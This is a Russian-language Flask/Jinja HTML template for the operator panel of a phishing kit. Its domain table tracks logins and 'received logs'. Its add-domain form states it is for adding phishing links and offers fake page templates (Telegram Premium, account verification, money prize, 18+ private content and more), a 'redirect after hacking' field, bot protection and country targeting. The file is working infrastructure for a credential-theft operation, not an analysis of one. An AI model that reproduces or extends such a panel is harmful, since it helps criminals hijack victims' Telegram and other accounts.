{% extends 'base.html' %}



{% block head %}
    <link rel="stylesheet" href="{{ url_for('static', filename='css/panel.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/domains.css') }}">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.4/css/select2.min.css" rel="stylesheet" />
{% endblock %}


{% block body %}
{% include 'header.html' %}


<section class="domains">
<div class="container">
    <h3 class="title">Мои домены</h3>
    <p class="desc">Здесь вы можете добавить домены и смотреть текущию домены</p>
    
    <button class="domains__btn btn" data-fancybox data-src="#add_domains">Добавить домен</button>
    

    <div class="main__table-container">
        <h3 class="main__table-title">Количество доменов: {{ domains | length }}</h3>
        <table>
            <thead>
                <tr>
                    <th>Домен</th>
                    <th>NS сервера</th>
                    <th>Шаблон</th>
                    <th>Защита</th>
                    <th>Состояние</th>
                    <th>Входы</th>
                    <th>Полученные логи</th>
                </tr>
            </thead>
            <tbody>
                {% for domain in domains %}
                <tr>
                    <td>{{ domain[0] }}</td>
                    <td>{{ domain[1] }}</td>
                    <td>{{ domain[2] }}</td>
                    <td>{{ domain[3] }}</td>
                    <td>{{ domain[4] }}</td>
                    <td>{{ domain[5] }}</td>
                    <td>{{ domain[6] }}</td>
                </tr>
                {% endfor %}
            </tbody>
        </table>
    </div>

</div>
</section>







<div class="hidden" id="add_domains">
    <h3 class="title">Добавить домен</h3>
    <p class="desc">Здесь вы можете добавить фишинговые ссылки</p>
    <form action="" class="form">
        <label for="" class="form__title">Домен</label>
        <input type="text" placeholder="Введите домен..." class="form__input" id="domain">

        <label for="" class="form__title">Шаблон фейка</label>
        <select id="page" class="form__input">
            <option value="">Выберите фейк</option>
            <option value="tg-premium">Telegram Premium</option>
            <option value="account-verf">Верификация аккаунта</option>
            <option value="vote-friend">Голос другу</option>
            <option value="money-prize">Денежный приз</option>
            <option value="bot-access">Доступ к боту</option>
            <option value="get-account">Забрать аккаунт</option>
            <option value="likes">Накрутка лайков</option>
            <option value="private">Приват 18+</option>
            <option value="login">Простой вход</option>
            <option value="votes">Участие в голосовании</option>
        </select>

        <label for="" class="form__title">Дополнительный ключ</label>
        <input type="text" placeholder="Введите ключ" class="form__input" id="path">

        <label for="" class="form__title">Редирект с главной домена</label>
        <input type="text" placeholder="Введите URL" class="form__input" id="redirect">

        <label for="" class="form__title">Редирект после взлома</label>
        <input type="text" placeholder="Введите URL" class="form__input" id="redirect_success">


        <label for="" class="form__title">Включить защиту от ботов (Captcha Cloudflare)</label>
        <input type="checkbox" class="form__checkbox" id="security">
        

        <label for="" class="form__title">Выберите страны вашей аудитории (защита от DDOS)</label>
        <select class="js-select2" multiple="multiple" class="form__input">
            <option data-badge="" value="AF">Afghanistan</option>
            <option data-badge="" value="AL">Albania</option>
            <option data-badge="" value="DZ">Algeria</option>
            <option data-badge="" value="AD">Andorra</option>
            <option data-badge="" value="AO">Angola</option>
            <option data-badge="" value="AG">Antigua and Barbuda</option>
            <option data-badge="" value="AR">Argentina</option>
            <option data-badge="" value="AM">Armenia</option>
            <option data-badge="" value="AU">Australia</option>
            <option data-badge="" value="AT">Austria</option>
            <option data-badge="" value="AZ">Azerbaijan</option>
            <option data-badge="" value="BS">Bahamas</option>
            <option data-badge="" value="BH">Bahrain</option>
            <option data-badge="" value="BD">Bangladesh</option>
            <option data-badge="" value="BB">Barbados</option>
            <option data-badge="" value="BY">Belarus</option>
            <option data-badge="" value="BE">Belgium</option>
            <option data-badge="" value="BZ">Belize</option>
            <option data-badge="" value="BJ">Benin</option>
            <option data-badge="" value="BT">Bhutan</option>
            <option data-badge="" value="BO">Bolivia</option>
            <option data-badge="" value="BA">Bosnia and Herzegovina</option>
            <option data-badge="" value="BW">Botswana</option>
            <option data-badge="" value="BR">Brazil</option>
            <option data-badge="" value="BN">Brunei</option>
            <option data-badge="" value="BG">Bulgaria</option>
            <option data-badge="" value="BF">Burkina Faso</option>
            <option data-badge="" value="BI">Burundi</option>
            <option data-badge="" value="CV">Cabo Verde</option>
            <option data-badge="" value="KH">Cambodia</option>
            <option data-badge="" value="CM">Cameroon</option>
            <option data-badge="" value="CA">Canada</option>
            <option data-badge="" value="CF">Central African Republic</option>
            <option data-badge="" value="TD">Chad</option>
            <option data-badge="" value="CL">Chile</option>
            <option data-badge="" value="CN">China</option>
            <option data-badge="" value="CO">Colombia</option>
            <option data-badge="" value="KM">Comoros</option>
            <option data-badge="" value="CG">Congo (Congo-Brazzaville)</option>
            <option data-badge="" value="CR">Costa Rica</option>
            <option data-badge="" value="HR">Croatia</option>
            <option data-badge="" value="CU">Cuba</option>
            <option data-badge="" value="CY">Cyprus</option>
            <option data-badge="" value="CZ">Czechia (Czech Republic)</option>
            <option data-badge="" value="CD">Democratic Republic of the Congo</option>
            <option data-badge="" value="DK">Denmark</option>
            <option data-badge="" value="DJ">Djibouti</option>
            <option data-badge="" value="DM">Dominica</option>
            <option data-badge="" value="DO">Dominican Republic</option>
            <option data-badge="" value="TL">East Timor (Timor-Leste)</option>
            <option data-badge="" value="EC">Ecuador</option>
            <option data-badge="" value="EG">Egypt</option>
            <option data-badge="" value="SV">El Salvador</option>
            <option data-badge="" value="GQ">Equatorial Guinea</option>
            <option data-badge="" value="ER">Eritrea</option>
            <option data-badge="" value="EE">Estonia</option>
            <option data-badge="" value="SZ">Eswatini</option>
            <option data-badge="" value="ET">Ethiopia</option>
            <option data-badge="" value="FJ">Fiji</option>
            <option data-badge="" value="FI">Finland</option>
            <option data-badge="" value="FR">France</option>
            <option data-badge="" value="GA">Gabon</option>
            <option data-badge="" value="GM">Gambia</option>
            <option data-badge="" value="GE">Georgia</option>
            <option data-badge="" value="DE">Germany</option>
            <option data-badge="" value="GH">Ghana</option>
            <option data-badge="" value="GR">Greece</option>
            <option data-badge="" value="GD">Grenada</option>
            <option data-badge="" value="GT">Guatemala</option>
            <option data-badge="" value="GN">Guinea</option>
            <option data-badge="" value="GW">Guinea-Bissau</option>
            <option data-badge="" value="GY">Guyana</option>
            <option data-badge="" value="HT">Haiti</option>
            <option data-badge="" value="VA">Holy See</option>
            <option data-badge="" value="HN">Honduras</option>
            <option data-badge="" value="HU">Hungary</option>
            <option data-badge="" value="IS">Iceland</option>
            <option data-badge="" value="IN">India</option>
            <option data-badge="" value="ID">Indonesia</option>
            <option data-badge="" value="IR">Iran</option>
            <option data-badge="" value="IQ">Iraq</option>
            <option data-badge="" value="IE">Ireland</option>
            <option data-badge="" value="IL">Israel</option>
            <option data-badge="" value="IT">Italy</option>
            <option data-badge="" value="CI">Ivory Coast</option>
            <option data-badge="" value="JM">Jamaica</option>
            <option data-badge="" value="JP">Japan</option>
            <option data-badge="" value="JO">Jordan</option>
            <option data-badge="" value="KZ">Kazakhstan</option>
            <option data-badge="" value="KE">Kenya</option>
            <option data-badge="" value="KI">Kiribati</option>
            <option data-badge="" value="XK">Kosovo</option>
            <option data-badge="" value="KW">Kuwait</option>
            <option data-badge="" value="KG">Kyrgyzstan</option>
            <option data-badge="" value="LA">Laos</option>
            <option data-badge="" value="LV">Latvia</option>
            <option data-badge="" value="LB">Lebanon</option>
            <option data-badge="" value="LS">Lesotho</option>
            <option data-badge="" value="LR">Liberia</option>
            <option data-badge="" value="LY">Libya</option>
            <option data-badge="" value="LI">Liechtenstein</option>
            <option data-badge="" value="LT">Lithuania</option>
            <option data-badge="" value="LU">Luxembourg</option>
            <option data-badge="" value="MG">Madagascar</option>
            <option data-badge="" value="MW">Malawi</option>
            <option data-badge="" value="MY">Malaysia</option>
            <option data-badge="" value="MV">Maldives</option>
            <option data-badge="" value="ML">Mali</option>
            <option data-badge="" value="MT">Malta</option>
            <option data-badge="" value="MH">Marshall Islands</option>
            <option data-badge="" value="MR">Mauritania</option>
            <option data-badge="" value="MU">Mauritius</option>
            <option data-badge="" value="MX">Mexico</option>
            <option data-badge="" value="FM">Micronesia</option>
            <option data-badge="" value="MD">Moldova</option>
            <option data-badge="" value="MC">Monaco</option>
            <option data-badge="" value="MN">Mongolia</option>
            <option data-badge="" value="ME">Montenegro</option>
            <option data-badge="" value="MA">Morocco</option>
            <option data-badge="" value="MZ">Mozambique</option>
            <option data-badge="" value="MM">Myanmar (formerly Burma)</option>
            <option data-badge="" value="NA">Namibia</option>
            <option data-badge="" value="NR">Nauru</option>
            <option data-badge="" value="NP">Nepal</option>
            <option data-badge="" value="NL">Netherlands</option>
            <option data-badge="" value="NZ">New Zealand</option>
            <option data-badge="" value="NI">Nicaragua</option>
            <option data-badge="" value="NE">Niger</option>
            <option data-badge="" value="NG">Nigeria</option>
            <option data-badge="" value="KP">North Korea</option>
            <option data-badge="" value="MK">North Macedonia (formerly Macedonia)</option>
            <option data-badge="" value="NO">Norway</option>
            <option data-badge="" value="OM">Oman</option>
            <option data-badge="" value="PK">Pakistan</option>
            <option data-badge="" value="PW">Palau</option>
            <option data-badge="" value="PS">Palestine State</option>
            <option data-badge="" value="PA">Panama</option>
            <option data-badge="" value="PG">Papua New Guinea</option>
            <option data-badge="" value="PY">Paraguay</option>
            <option data-badge="" value="PE">Peru</option>
            <option data-badge="" value="PH">Philippines</option>
            <option data-badge="" value="PL">Poland</option>
            <option data-badge="" value="PT">Portugal</option>
            <option data-badge="" value="QA">Qatar</option>
            <option data-badge="" value="RO">Romania</option>
            <option data-badge="" value="RU">Russia</option>
            <option data-badge="" value="RW">Rwanda</option>
            <option data-badge="" value="KN">Saint Kitts and Nevis</option>
            <option data-badge="" value="LC">Saint Lucia</option>
            <option data-badge="" value="VC">Saint Vincent and the Grenadines</option>
            <option data-badge="" value="WS">Samoa</option>
            <option data-badge="" value="SM">San Marino</option>
            <option data-badge="" value="ST">Sao Tome and Principe</option>
            <option data-badge="" value="SA">Saudi Arabia</option>
            <option data-badge="" value="SN">Senegal</option>
            <option data-badge="" value="RS">Serbia</option>
            <option data-badge="" value="SC">Seychelles</option>
            <option data-badge="" value="SL">Sierra Leone</option>
            <option data-badge="" value="SG">Singapore</option>
            <option data-badge="" value="SK">Slovakia</option>
            <option data-badge="" value="SI">Slovenia</option>
            <option data-badge="" value="SB">Solomon Islands</option>
            <option data-badge="" value="SO">Somalia</option>
            <option data-badge="" value="ZA">South Africa</option>
            <option data-badge="" value="KR">South Korea</option>
            <option data-badge="" value="SS">South Sudan</option>
            <option data-badge="" value="ES">Spain</option>
            <option data-badge="" value="LK">Sri Lanka</option>
            <option data-badge="" value="SD">Sudan</option>
            <option data-badge="" value="SR">Suriname</option>
            <option data-badge="" value="SE">Sweden</option>
            <option data-badge="" value="CH">Switzerland</option>
            <option data-badge="" value="SY">Syria</option>
            <option data-badge="" value="TJ">Tajikistan</option>
            <option data-badge="" value="TZ">Tanzania</option>
            <option data-badge="" value="TH">Thailand</option>
            <option data-badge="" value="TG">Togo</option>
            <option data-badge="" value="TO">Tonga</option>
            <option data-badge="" value="TT">Trinidad and Tobago</option>
            <option data-badge="" value="TN">Tunisia</option>
            <option data-badge="" value="TR">Turkey</option>
            <option data-badge="" value="TM">Turkmenistan</option>
            <option data-badge="" value="TV">Tuvalu</option>
            <option data-badge="" value="UG">Uganda</option>
            <option data-badge="" value="UA">Ukraine</option>
            <option data-badge="" value="AE">United Arab Emirates</option>
            <option data-badge="" value="GB">United Kingdom</option>
            <option data-badge="" value="US">United States of America</option>
            <option data-badge="" value="UY">Uruguay</option>
            <option data-badge="" value="UZ">Uzbekistan</option>
            <option data-badge="" value="VU">Vanuatu</option>
            <option data-badge="" value="VE">Venezuela</option>
            <option data-badge="" value="VN">Vietnam</option>
            <option data-badge="" value="YE">Yemen</option>
            <option data-badge="" value="ZM">Zambia</option>
            <option data-badge="" value="ZW">Zimbabwe</option>
        </select>

        <input type="submit" class="form__button btn" value="Добавить">
    </form>
</div>


{% endblock %}

{% block script %}
<script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.4/js/select2.min.js"></script>
<script src="{{ url_for('static', filename='js/panel.js') }}"></script>
<script src="{{ url_for('static', filename='js/domains.js') }}"></script>
{% endblock %}